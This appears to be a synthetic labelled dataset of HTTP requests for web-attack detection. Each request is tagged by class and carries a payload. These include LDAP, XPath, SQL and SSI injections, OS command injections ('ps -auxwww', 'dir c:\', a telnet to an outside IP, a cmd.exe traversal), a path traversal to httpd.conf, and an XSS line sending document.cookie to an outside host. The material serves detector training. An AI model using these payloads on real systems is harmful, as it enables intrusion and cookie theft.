If-None-Match: "wkW908nD@s64TjzHLTy"
If-Range: Sat, 30 Jul 05 12:00:22 CET
Max-Forwards: 8730
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest uri=/teoadOp/uies/ebnnhteb/ariuiir/caepcrnU.pdf
Authorization: snsb ewp1fidy=azimom
Range: 338-,-31040,26925-
Referer: http://pHfls2nt.it/mfj5/rtgt/Eradeegt/tih7tth.js
TE: deflate;q=0.8,chunked;q=0.8
Trailer: User-Agent
User-Agent: Mozilla/1.8 (Machintosh; U; Mac OS X 8.0; ta-rs; rv:8.5.3) Gecko/16775813
UA-CPU: StrongARM
UA-Disp: 749,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 1177x8327
Via: eut1e/5.9 198.116.243.21
Transfer-Encoding: identity
Upgrade: eimdea/6.6
Warning: 826 www.ta4rtlrX.css "e3eAsf" 
X-Forwarded-For: 254.171.174.88
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45190
Start - Id: 38240
class: LdapInjection
GET /tmQUIeGo2/slWNRyW/eX4vW7fbdzmZ/e3nt/itkrogd0tiorireb/nzkzwoeua/nVqLtbh3Q3/iknqeoomrrtrapsit/wo/2uhenFBRwL8ZnkkE8.bin?pP39V4CV9I=iwk%29SeOtelneta%3Bi%3Fooceas&htlMel=-93wmro&hfotuswmn=%29%28+++%7C++++%28++cn%3D*o++%27brien*++++%29%28mail+++%3D*o+%27brien*++++%29+&fMAv=hz&1caaostoMh1=fE HTTP/1.1
Host: 160.90.76.153
Connection: close
Accept: audio/basic;q=0.0, video/*;q=0.2, audio/*
Accept-Charset: euc-tw;q=0.7, x-mac-ce, euc-cn;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=07911
Client-ip: 33.129.121.168
Cookie: 1teoh6=874494;stuPmwst71h=n)7liket
Cookie2: $Version="945"
Date: Tue, 20 Dec 05 02:05:20 UTC
ETag: W/"4bKLWIf8NoM0jqgX"
Expect: lereii
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Wed, 12 Jul 06 13:04:39 CET
If-Unmodified-Since: Fri, 11 Jan 08 08:23:32 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3096
MIME-Version: 3.3
Pragma: eertnoe=iur
Proxy-Authorization: hgak4o jyhewio=ntfs
Authorization: Digest realm
Range: -88,49314-030507
Referer: http://Uulp.uk/ecaAlu/4Lnqg/ueou/hrO4ecE.sh
TE: trailers,deflate
Trailer: Connection
User-Agent: Mozilla/4.2 (compatible; huhnm; Win98; onTeay; ssvot; b53rhv)
UA-CPU: StrongARM
UA-Disp: 390,422,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 265x803
Via: 5.0 www.vhntdrno.js, HTTP/2.8 www.8Irn9az8.js:237, 7.9 72.162.108.12
Transfer-Encoding: gzip
Upgrade: eddcT/3.3, roas/0.6
Warning: 960 www.duToe.shtml "ptStgi2naAcbsign2b" "Wed, 02 Nov 05 20:39:52 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 3952858356016801
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38240
Start - Id: 48360
class: XPathInjection
GET /WXhtaccesfmolL/gJe_X@hrdCeg@/T1b3optkOIR/onyaemll/1YIul7_CuhuDX@/tibsrtmt2tDpq/seaeonnesofeoeelI/processing-instructionLW.mspx?iS=eZStnONDOTy&4jmnDbA=deleteamngpa%3Btn&imsiemprkeraes=2987252&mt9itta2heAHt=oieXI0Vi_&IjZDHHucmdT@.=lqsaE%3Falllh2&ssphkrtie=836&iamoibiatxyb=9 HTTP/1.0
Host: www.ryaaVr.it:80
Connection: keep-alive
Accept: text/plain, text/*;q=0.5, text/*
Accept-Charset: x-mac-hebrew;q=0.7, iso-8859-4;q=0.9
Accept-Encoding: m6ho2oh'    or    path/child::node()[position()=N]    or    'alEeh2o'    =  '
Accept-Language: *;q=0.8
Cache-Control: eno=m5eeml
Client-ip: 135.61.177.8
Cookie: Mrz=aicir9hrPrhKfOus
Cookie2: $Version="99"
Date: Tue, 04 Aug 09 14:29:05 UTC
ETag: W/"VVlmRgRp-f_ke8iJh"
Expect: thOy7e=Ytrrd
From: bZh5tttn@Amirealh.de
If-Modified-Since: Tue, 29 Jun 04 04:26:19 GMT
If-Unmodified-Since: Fri, 01 Jul 05 19:46:13 GMT
If-Match: "VsccFMUpV8RCJ_v"
If-None-Match: *
If-Range: Sun, 12 Sep 04 10:02:34 UTC
Max-Forwards: 7037
MIME-Version: 4.9
Pragma: diotn='rrg'
Proxy-Authorization: nya1hs uees=eeteostl
Authorization: Digest realm
Range: 77-2889,6-
Referer: http://sablLe.be/urUoi/rssut/utiedi/7snm/idig.asp
TE: trailers
Trailer: Accept
User-Agent: ev.lNGBYI http://www.nhwefh.org
UA-Disp: 761,406,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 784x5970
Via: 2.4 www.rrmtkm.css
Transfer-Encoding: compress
Upgrade: s4jf/0.3, eel/4.5, A5ooh7/7.4, Hnyzt/6.0
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 152.22.134.108
X-Serial-Number: 2527900
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48360
Start - Id: 40776
class: SSI
PUT /eOkNQjE1xOyJB/2rA7/aEtlcia/tobragmcsoVlgtt/tPBC1H/9OHO.bin? HTTP/1.0
Content-Length: 255
Content-Language: 0f3ojh,ltnH
Content-Encoding: compress
Content-Location: http://dSads.st/Ett0NhE.txt
Content-MD5: Y2dvdHJiOTB0OWhhN25pYw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Aug 07 13:20:37 GMT
Last-Modified: Sun, 17 Apr 05 14:30:09 CET
Host: www.nslia.it
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: lPnkO-sodieo;q=0.1, rerthe5-pr;q=0.3
Cache-Control: min-fresh=524
Cookie: 4eiitt4=801;Elkforma=66586033;aey8ir1aeubl8i=009627816;mu=58782;e0tdn=wp-oza|teyos Ep 0l
Cookie2: $Version="096"
ETag: "_4SMIhw0@m0IpS4g"
Expect: 100-continue
If-Modified-Since: Thu, 01 Mar 07 08:47:18 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 29 Feb 08 18:38:51 UTC
Max-Forwards: 0566
Pragma: oYaenm='snrlA'
Proxy-Authorization: Digest opaque="lnld"
Authorization: mlme5 ehrrd=Notplt
Range: -02,-1581
Referer: /asfth/mccf.mpeg
User-Agent: nquaqs3ttenlyz
Transfer-Encoding: identity
----: -----------------------------------------

Vxingbritfapod=71012&agctVHrrd=ehai&volkcHanotpayt=0NQS3yH&VZtelnetBaT0a=75338&Hig1Q5f=<!--   #odbc statement=    "select   sonpsQ,     Tsawntea,    ljDt from     ieqde     order  by 1,   700,   1"   -->&au7elst2Dsgaie=7&afafazona=66

End - Id: 40776
Start - Id: 43276
class: OsCommanding
GET /gesadneejnThFp8vr7/2PgBPF-0G89cQZ/61TEX0jpxUKWY2MpO/zhCrelirnhnsgrAuti/uNQ4g.html?wwfaeFz=egeQSmfoo&oee=%7C++ps+-auxwww++%3B&xazttsfrp=cdd HTTP/1.0
Host: 236.15.84.132
Connection: lisoald
Accept: image/png;q=0.5, video/quicktime;q=0.8, video/mpeg;q=0.2
Accept-Charset: utf-8, euc-tw;q=0.5, us-ascii;q=0.8, windows-1252
Accept-Encoding: gzip;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 199.96.226.205
Cookie: eg=8i;meta7CA=i-HF;iOsystem7Vm=wntdo5&9e;emleygdrcnRt=67258735;lrt=wftphopens;guetaoasns7=uhsfni0ct
Cookie2: $Version="414"
Date: Fri, 29 Sep 06 08:56:13 GMT
ETag: "z_5BfkhKaV82SwEk57_"
Expect: b1t3F5ik=ccEnhleR;tysne=masht6
From: litow@dtisn.uk
If-Modified-Since: Sun, 18 Jul 04 11:02:48 UTC
If-Unmodified-Since: Sat, 27 Jun 09 08:50:03 GMT
If-Match: *
If-None-Match: "i6IRoZvzAP90gAs3PG"
If-Range: *
Max-Forwards: 20
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest response="0B3cEb0aBbFc900Db7cC68fE50d55Ca6"
Authorization: mtat GoltfEre=elAxoea
Range: 6444-90250,-039,9-0896
Referer: /eesse/tetxE/tglaq/beow/AeaOifs.cgi
TE: trailers,trailers
Trailer: Range
User-Agent: rTtoereo/9.5
UA-CPU: PowerPC
UA-Disp: 649,3130,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 267x450
Via: 7.9 www.zm0t.tiff:79
Transfer-Encoding: compress
Upgrade: siree/9.1, 17aa/1.9
Warning: 824 77.211.235.51 "cihtsshy" "Wed, 01 Mar 06 07:42:35 UTC"
X-Forwarded-For: 160.47.213.152
X-Serial-Number: 9975739043069
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43276
Start - Id: 38196
class: LdapInjection
GET /iEwiH/Tn/bodyzH9Hggroup byNQBX/gv/5xkA/varQDiui9jO.oWEv/dMR-XQ/earawrschi/e9pIVCQ/7vW.TXY/5eoto.shtml?oiihwosb3rl7tva=havingixmleMn9&UunionycmdNUQWXU=opou&7inBiioego=UghMeg&foemwel=howa2divanli+xtrjez&3PDt3e6r=41741226&NsSBhq=Cdlo&is=26802&SsSbetrtgt2rb=%29++++%28%7C++++%28displayName%3Dhad*%29%28name+++%3D++had*++%29%28++mail%3Dhad*++%29&huYisDdraeiesoc=k%3Bs&WrcpO2kzrRv=xirsisj9sm%3F&txFean9ogce=363855&o0y=gme43tuNyct3a&6ol6s=wc+t HTTP/1.1
Host: 132.100.55.177
Connection: repboe
Accept: audio/x-wav;q=0.2, application/postscript, image/png
Accept-Charset: iso-8859-1
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 9.211.101.123
Cookie: sCv@-9YjRM-=i6henpeelahNoarac;ih=303
Cookie2: $Version="97"
Date: Mon, 12 May 08 13:50:01 UTC
ETag: W/"h8N@m2DAd.B8ytb2d"
Expect: anoae=Rywdsuv
From: hnrpa@Dtsdlni.be
If-Modified-Since: Tue, 25 Jan 05 14:43:53 CET
If-Unmodified-Since: Tue, 24 Jun 08 19:47:23 CET
If-Match: *
If-None-Match: "xRfhsU1GvSSfCM_YUjT"
If-Range: Mon, 15 Nov 04 24:15:44 UTC
Max-Forwards: 3818
MIME-Version: 9.1
Pragma: at='ca'
Proxy-Authorization: Digest nonce
Authorization: hmtuel fet4=hcsyo
Range: -49,281-
Referer: http://nonln.de/tatesf/2dnh2/naHtsa/c7kyI6ks/rfn0tn.exe
TE: deflate;q=0.0,trailers,deflate;q=0.4
Trailer: If-None-Match
User-Agent: vhGsedbrnoltc
UA-CPU: StrongARM
UA-Disp: 843,585,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8072x4973
Via: 2.7 www.heddo.jpeg, 4.7 200.64.122.175, 0.2 www.dq6im.jpeg
Transfer-Encoding: deflate
Upgrade: aec/9.2, nnrn/6.5, ldi/7.0, 7et/3.4, auo/7.2
Warning: 995 www.tstihc.htm "sL1halusfi" 
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 092315765
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38196
Start - Id: 46368
class: PathTransversal
GET /Xg3LUO/olfBTy03a0/eRiENMA9_6sms.Q@@0A/tGQZ3VTpN_zRPA/noe8aaoeCm/M_DOBnR-UN-t/hcheDBpv4Gd/sAMd/cegjefanXHyrypgte7a8/7etanehnabfc6Sjury/wwai9ZaUUBjMZSoysjeC/adJbv3@AlKJl.msf?nToqerasnarokhM=+nalid5ewinntvcnahe&m3eeoleaeietrc=RYps&CGwcKu1YK=6294233&gerhLeu=07688&on2as=tso%26&ntSer=hx1QeIJ&EarntcgNee=emnseetil&etBrif=%2Fetc%2Fhttpd%2Fhttpd.conf&tem=shk+&qtweuselnheedah=acktmpthrcm&styudrtaowshvu=seRrei%5Doxaxe HTTP/1.0
Host: www.ynAii3e.biz:80
Connection: keep-alive
Accept: application/*;q=0.5, text/html
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: etn3mhrq-rsrt, e-so, uheddaE-ese, t8wran-g9EPm2ea;q=0.2
Cache-Control: only-if-cached
Client-ip: 214.183.248.166
Cookie: tmvE0=l1he;n9ht7Tsy2=299657;orlfjnrs=e1ihhomehvqSn/ andyro;n4rtudjLcw=)gapa
Cookie2: $Version="402"
Date: Mon, 26 Nov 07 23:18:33 UTC
ETag: W/"jgwdRdcly_6yEEbe9Sv@"
Expect: f4eai5=rspwo;urlr=7czuo
From: cewts@1fgr.fr
If-Modified-Since: Thu, 19 Jun 08 14:25:17 GMT
If-Unmodified-Since: Wed, 20 Aug 08 14:09:37 CET
If-Match: *
If-None-Match: "pcMMfBcBpW4B.Uakz"
If-Range: Fri, 18 Aug 06 02:38:00 GMT
Max-Forwards: 98
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM YWFHbUVzVWVJY2E0dmY0bHNybWVkbnJuUmJlMHNhamlobG8zdXM=
Authorization: NTLM dUg5aXJFbW9odmxvZTJzeWV0ZTdhdGFkcjVhZGhzdHBFenl0bA==
Range: 2-1818,846125-
Referer: /xDAsee.dll
TE: trailers,trailers,chunked
Trailer: Expect
User-Agent: HpsfoOu (apf7cW.6zq; eKrhWfY; sK3BX4-)
UA-CPU: StrongARM
UA-Color: color8
UA-Pixels: 3216x516
Via: FTP/3.2 www.wsln8.htm, 9tsCa/2.2 www.eyi4eni.jpg:8263, tsbh/4.1 www.gees.htm
Transfer-Encoding: stg2; llfa=ecsm
Upgrade: ls17ea/6.1, if8/2.6, eEewts/0.2, pvyt/8.4
Warning: 298 47.169.61.113 "pr6idci4mnm8" "Fri, 15 May 09 02:27:43 UTC"
X-Forwarded-For: 241.79.66.180
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46368
Start - Id: 37915
class: LdapInjection
GET /5c6fv04t6F1p_3G_U@/3w6qkDcqlQ2qi7/a1Yrnr6ne/iSQ5WK_0./nn0R0el/tldn/y8A7ohisber0ssdr/5FKSIiD/xupdatek/ea2fOqbYFm/oeWhdteet/eie.cfm?XmochaV7sAk2binwe=%29+%28++++%7C++++%28displayName%3Dhad*%29+%28name%3Dhad*+++%29%28+++mail%3Dhad*++%29&mis=613335 HTTP/1.0
Host: 27.215.228.218
Connection: close
Accept: audio/x-wav;q=0.6
Accept-Charset: iso-8859-1, windows-1252;q=0.2, big5, iso-8859-8-i, windows-1257;q=0.0
Accept-Encoding: deflate;q=0.5, gzip, identity;q=0.6
Accept-Language: ihaibeio-nb;q=0.6, sib-dtlrar
Cache-Control: no-store
Client-ip: 206.217.112.201
Cookie: msmntE=Deolm8Et
Cookie2: $Version="988"
Date: Fri, 19 Mar 04 14:20:13 CET
ETag: W/"soqXkoKH3wNfz3Lwxq"
Expect: aPouw=afta
From: ricsu5la@emarau.st
If-Modified-Since: Sun, 02 Mar 08 16:07:36 UTC
If-Unmodified-Since: Thu, 24 Nov 05 01:30:23 UTC
If-Match: *
If-None-Match: *
If-Range: "xNIn41ga3M_PIV28MzhN"
Max-Forwards: 416
MIME-Version: 7.8
Pragma: Pns=n0dySecy
Proxy-Authorization: Digest username="Ecqddp7j"
Authorization: gepae l6dnns=mnV5noNl
Range: 462856-56111,-65
Referer: /pf5n/2wnor0at/cegytier/hrsnD.mpeg
TE: trailers,trailers
Trailer: Host
User-Agent: 3etaaeeKn (relVi9; aoJVmiL5; 333s6.Xk6d)
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 649x451
Via: 4.7 www.otneeng.tiff, 7.1 www.ohtji.jpg
Transfer-Encoding: idode; 2uroj=S05Aid
Upgrade: vmr4ce/8.6, ad1h/2.0, 4cr/6.0
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 94.140.32.18
X-Serial-Number: 03021
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 37915
Start - Id: 47580
class: XSS
GET /lf6idtfau0m1htlsa1/istne7in3gnwrb9/de7likenJ23aXbOidC/2lVnK4FRz93DC/fBUbYSM7eWgDndVuzth/tCvcw/pQDM3qAOc9jvSIUG71.gif?geei=2604690&sse=rN&X_fWjOdZl=7641606&tlQhstgq8rrll8r=%3Cdiv++++style+++%3D+%22++++width%3A+expression%28%5Bwindow.open%28%27http%3A%2F%2F87.130.112.29%2Ficli.jsp%27%2Bdocument.cookie%29%3B%5D%29%3B++++%22++%3E HTTP/1.0
Host: www.lNOwd.cz:80
Connection: close
Accept: application/postscript;q=0.3, text/html, audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.0
Cache-Control: max-age=954
Client-ip: 118.106.166.150
Cookie: yso8reay=a5TPe
Cookie2: $Version="3"
Date: Sun, 04 Mar 07 16:21:59 UTC
ETag: W/"ykYpVFv4o2eRsz_1U"
Expect: 2eEi8
From: i5nNat@viikl.cz
If-Modified-Since: Fri, 09 Dec 05 22:49:23 CET
If-Unmodified-Since: Mon, 31 Aug 09 23:36:34 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 402
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: lttc 1geto=iareHg
Authorization: NTLM dHZhc2VzeVNvbXNnYXNobGg1bmU1bGFkbW9tbzl2OGF0cjZzdHU=
Range: 7-,-18566
Referer: /ieel.mspx
TE: deflate;q=0.6,deflate;q=0.8,deflate;q=0.9
Trailer: If-None-Match
User-Agent: Mozilla/9.1 (X11; U; SunOS sun4u 0.1; au-r0; rv:9.6.3) Gecko/86565954
UA-CPU: StrongARM
UA-Disp: 2757,1725,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 924x017
Via: 9idere/1.6 190.7.161.71:54757, FTP/9.9 34.35.147.201, FTP/3.7 218.153.178.54
Transfer-Encoding: eenbH; ysete=etomFen
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 205 168.163.244.39 "rui0nun" "Thu, 26 Jan 06 03:08:13 CET"
X-Forwarded-For: 85.223.190.150
X-Serial-Number: 2524902769036083814
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47580
Start - Id: 35195
class: SqlInjection
GET /hT/dFgd1omHoqT9/fromsaXK/cu/sed8yhnhaFtmxhyohhni/gsutl.jpg?l7trtsia6o3=%27++++%2B++%28+SELECT+++++TOP++1+aa5i0l++FROM+++++eetd2Lye%29++++%2B+%27 HTTP/1.1
Host: 37.183.237.147:5640
Connection: iyueme8
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: bidkdN-hkrsnaia;q=0.7, uihujrAz-tegfasls;q=0.5, odon-zEgo, teiit-eshieYgr;q=0.4, t-mlreUidj
Cache-Control: no-store
Client-ip: 78.116.124.236
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="711"
Date: Sat, 08 Jan 05 02:50:12 GMT
ETag: "HObdl7XhHCM3PbVXqLV"
Expect: 100-continue
From: htoeiec@jwecgeb0.st
If-Modified-Since: Sat, 11 Mar 06 12:06:07 UTC
If-Unmodified-Since: Tue, 23 Sep 08 10:38:43 CET
If-Match: "VUm7f@B3lEfMzZ1"
If-None-Match: *
If-Range: Mon, 15 Jun 09 08:26:24 UTC
Max-Forwards: 959
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: 9trc 8rehoi=lhgsh5
Authorization: NTLM eW9meTd2N2Q5ZGxPdXJvYWlhcGpkZEd5cnd0N2lyMTJubG8=
Range: 7416-9436,-80
Referer: http://eumbg.de/heTpdi/t93aSh.wav
TE: trailers,trailers,gzip
Trailer: Accept
User-Agent: eomrnqcso31tteo
UA-CPU: StrongARM
UA-Disp: 601,1500,16
UA-Color: color32
UA-Pixels: 0990x1742
Via: FTP/5.2 33.31.52.42, 8.5 www.tdiachph.shtml, tebtFq/6.6 141.207.69.208
Transfer-Encoding: deflate
Upgrade: Iivqh/4.1, nEStsn/0.1, ocna/1.5, bea/5.8, n7i/2.7
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
X-Serial-Number: 33888894835
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35195
Start - Id: 43909
class: OsCommanding
GET /ssi/envout.bat?|dir%20..............1 HTTP/1.1
Host: 9.95.205.154
Connection: close
Accept: text/xml, video/mpeg;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: gzip;q=0.8, deflate, compress, gzip, compress;q=0.8
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 109.23.226.147
Cookie: lzxi79Lu=systemdene( ;oe;ov4CystyleVul=22
Cookie2: $Version="45"
Date: Tue, 25 Sep 07 15:41:48 GMT
ETag: W/"0oIq-QwFP03wjkKWU"
Expect: uthpmtzo
From: nehsxlsR@ou1hri.fr
If-Modified-Since: Tue, 14 Jun 05 24:13:49 CET
If-Unmodified-Since: Sat, 26 Jan 08 06:20:32 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 30 Nov 08 23:25:38 UTC
Max-Forwards: 59
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: I7d4 pxamohog=uiio
Authorization: jaier uicSij=Hxcaxs
Range: 6652-,-36477,66590-93
Referer: http://ypsieuEm.be/tpeinAgi/bard/dtae.cgi
TE: trailers,chunked;q=0.3
Trailer: If-Match
User-Agent: rlj6hraj (n9WmF9fK4E)
UA-CPU: StrongARM
UA-Disp: 0478,357,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 349x5070
Via: nse/8.9 26.125.63.37
Transfer-Encoding: compress
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 432 www.i7dte.html "w6tbf" "Sat, 14 Feb 04 01:47:29 UTC"
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43909
Start - Id: 42909
class: OsCommanding
PUT /ddq4CADdTR/ndneotc9g2nth9aqnes/21Wfj/rq4aHnO4fL/p7rkljqHYoXlw/qs/sBAiGtWsvBuA/hDeYbBM/ecslAUl8CJ9/asl1Ef8pOTqh8YeBsw/nJ_@gnL7EFugJIHq/tj@mcESAUe.tiff? HTTP/1.1
Content-Length: 93
Content-Language: cRoLorgi,iwaiHnhe,ebstn4
Content-Encoding: compress
Content-Location: /s5na/4bhswtd/CiSgparn/bnD1i.mp3
Content-MD5: bXNnZGFzdEZ0ZWRyZWVmMg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 01 Dec 07 05:40:12 CET
Last-Modified: Tue, 23 Oct 07 15:34:50 UTC
Host: 15.177.3.7:50
Connection: keep-alive
Accept: audio/*;q=0.7, video/quicktime;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.0
Cache-Control: max-age=3
Cookie: ChtaccesDrK.MN=04;ra=2;eopisesmceata=81.255.236.79 |  dir+c:\;sayduLm=1264835068;KE5jQ23=86237;ea9leetB2=335799
Date: Mon, 02 Feb 04 16:33:10 UTC
Expect: eedmsroa=te2x6;ciocoNem
If-Unmodified-Since: Wed, 18 Jan 06 22:18:49 UTC
Max-Forwards: 71
Pragma: obntIh='cLfesnsn'
Referer: /1aAsef/5Lhneci/hhWt.fgf
TE: chunked;q=0.6
User-Agent: Mozilla/4.1 (compatible; 3tgrnMltki; Mac OS X; uysttelsq; 1rheEn; a2d7x)
UA-Pixels: 315x4693
Transfer-Encoding: deflate
Warning: 468 22.180.227.236 "AasaHnehehogw59" "Thu, 27 Sep 07 14:30:58 CET"

yiedo4ln=93replaceekktozsup &kslaewmotC=2&yenetihOsY=932&wI67=e85pK6V&wuatnca6oaep34c=r0EMG5E

End - Id: 42909
Start - Id: 38716
class: LdapInjection
GET /positionservices-obdLbdoPjp/wHPT/2QtlP27k.pmFze3WC/5hLsQZMQjk032u6ypG/dJ2URTdt2GqePM50.DNG/hiShBb3mykzJkz/khavingcl1VlXS4B/8her/ai2reusrc7eorul99n/br@JFosYdWxc.c1X/tEz7eR2WspgrxThQbY.jsp?qe3b=4cZoyZzPfwNx&kS=hsi+u&hf4lzNgtnHamgTa=i-emfofeesttos%28&uauwsnestNExs=4717345&fej=5+positionore5v%3E%29+a&Esab=0&fchesdtofs=%29%28++++%7C+%28+++cn%3D*o++++%27brien*++++%29%28mail%3D*o++%27brien*+%29&DdclydMg=hrw7nIseeIt&negrrrhusF=zmocha&tgfa=i5rb&e7eerhtsdo3tlo=m HTTP/1.1
Host: 204.106.119.2
Connection: keep-alive
Accept: application/zip;q=0.1
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 95.161.31.177
Cookie: oe5=pS3H0jBsaH;3phomefyM.KT=hs_t2hhi;ysmye=y3d6processing-instructionln4sw;2armdr8aoe=usEcs0k0g
Cookie2: $Version="57"
Date: Wed, 26 Mar 08 09:04:44 UTC
ETag: W/"NFQTVepJm2oQTAnAc-"
Expect: 100-continue
From: ilrb@h5ihiwr.cz
If-Modified-Since: Sun, 21 Feb 10 22:37:01 UTC
If-Unmodified-Since: Mon, 13 Apr 09 10:00:37 CET
If-Match: "hBO3-EiL@.CCvD1PA@HY"
If-None-Match: "cJno@Uj23fjxIs1"
If-Range: "IBdIHPS9dyfxZofX"
Max-Forwards: 17
MIME-Version: 3.7
Pragma: 8teer3pr='nhI'
Proxy-Authorization: Basic cjY5b0hpZjp0aG1tYW90
Authorization: NTLM eVBhT2VyZWVlY2VlZXJ0b3NsUmNtc3JlOWZvZWUxbXdPbGN0
Range: 557810-
Referer: /renesu8r/swrRtna/foEtiw/A9dsw.htm
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/2.4 (Windows; U; WinNT 9.1; Ny-4b; rv:7.5.8) Gecko/47945686
UA-CPU: 68000
UA-Disp: 115,677,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 094x3377
Via: eituv/9.0 www.cH3sO.png
Transfer-Encoding: gzip
Upgrade: aio/4.8, yfbxla/4.5, a7nrka/5.7
Warning: 342 www.9ohgn.htm:935 "Zduaeomxwo5fiu" "Fri, 23 Dec 05 04:28:42 CET"
X-Forwarded-For: 18.156.103.46
X-Serial-Number: 0697506678006
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38716
Start - Id: 43231
class: OsCommanding
GET /thxuqhewtu1le/eeeop/p7/hQiTT4j/3er0eptrnngtnt/wr-ndgb@lSI/oth0o4lalas8cRl5fto/wIiHNLlj2pY_/srd9ldwrhrtsd/levdxtu.asmx?MntdteTlbslXaiu=%22+++++%3B++++telnet+20.34.190.234++80++%3B&_yKunionu=045065498 HTTP/1.0
Host: www.easf4.be
Connection: close
Accept: video/*;q=0.6, application/*
Accept-Charset: x-mac-turkish;q=0.8, x-mac-arabic;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: min-fresh=22690
Client-ip: 178.184.72.111
Cookie: krolnRaamatht=6;wLyst=9732350;nplie3t2eel=roeho
Cookie2: $Version="7"
Date: Sun, 04 Apr 10 07:25:31 CET
ETag: "si0ElM3X@WcQMbzOA"
Expect: cko1p=sTwOsene
From: Odth@g78cnm.uk
If-Modified-Since: Thu, 02 Aug 07 16:28:04 GMT
If-Unmodified-Since: Mon, 20 Aug 07 08:23:25 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 379
MIME-Version: 4.4
Pragma: t1=pnthant
Proxy-Authorization: NTLM eDlvZTZlYWF1b2FlamNzeU9JaXQzbmxmaHR1dGExNHNydWc=
Authorization: Basic ZWVyM0U6cmF0dXNl
Range: -80151
Referer: /odaeieid/edamrtit/uyru/0ipe86un/stapoeh.rar
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/0.6 (compatible; MSIE 5.1; Win 9x; ajd3e; H0TrieOmwt)
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4808x019
Via: kea1oa/8.3 160.129.43.146
Transfer-Encoding: enoem
Upgrade: gSz/4.2, Gseoi/5.8, rch5/7.9, 6re6d/0.4
Warning: 473 www.sStrCzh.js "hicttlor5tflF" 
X-Forwarded-For: 25.139.59.161
X-Serial-Number: 3809752703652
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43231
Start - Id: 44525
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 146.6.250.245:80
Connection: phslheti
Accept: image/jpeg;q=0.2, image/png;q=0.8, audio/basic;q=0.7
Accept-Charset: *
Accept-Encoding: *
Accept-Language: oETh-1
Cache-Control: no-transform
Cookie: occhecsmCeeEe=ct@qN@7W@56P;VHAS-usr=hqao3hbtDtLuts;ppseedi=o6i;dcddgriiiestce=cGIt88rI5;QxWBb.=m 
